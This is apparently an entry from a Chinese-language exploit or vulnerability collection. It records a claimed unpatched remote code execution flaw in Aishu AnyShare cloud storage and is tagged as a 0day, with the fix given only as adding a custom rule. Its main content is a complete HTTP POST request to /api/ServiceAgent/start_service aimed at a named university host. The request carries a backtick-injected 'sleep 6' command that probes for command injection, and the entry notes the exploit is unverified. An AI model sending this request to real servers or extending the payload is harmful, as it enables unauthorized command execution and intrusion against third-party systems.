vendor = "爱数"
name = "爱数AnyShare爱数云盘start_service远程代码执行"
type = "RCE"
version = "未知"
path = "/api/ServiceAgent/start_service"
detail = "POST /api/ServiceAgent/start_service HTTP/1.1 Host: anyshare.shufe.edu.cn Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 13 Content-Type: application/json User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 [\"`sleep 6`\"]"
fix = "添加自定义规则"
date = "0701"
label = "0day"
verifier = "没环境 待验真"
